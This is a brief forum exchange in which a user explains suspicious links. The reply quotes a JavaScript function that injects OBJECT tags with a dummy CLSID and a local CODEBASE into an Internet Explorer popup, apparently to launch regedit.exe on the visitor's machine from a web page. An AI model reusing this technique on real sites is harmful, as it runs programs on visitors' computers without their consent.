Manipulation!

greenfreak said:
I'm afraid to click on them. Tell me what it does.
It has a list of links to programs on your computer. Basically you can hyperlink to your applications...

Code:
function openRegedit()
{

    var oPopBody = oPopup.document.body;
     oPopBody.innerHTML = '<OBJECT NAME=&quot;X&quot; CLASSID=&quot;CLSID:11111111-1111-1111-1111-111111111111&quot; CODEBASE=&quot;c:/windows/Regedit.exe&quot;></OBJECT><OBJECT NAME=&quot;X&quot; CLASSID=&quot;CLSID:11111111-1111-1111-1111-111111111111&quot; CODEBASE=&quot;c:/winnt/regedit.exe&quot;></OBJECT>';
     oPopup.show(290, 190, 200, 200, document.body);
}
 
Back
Top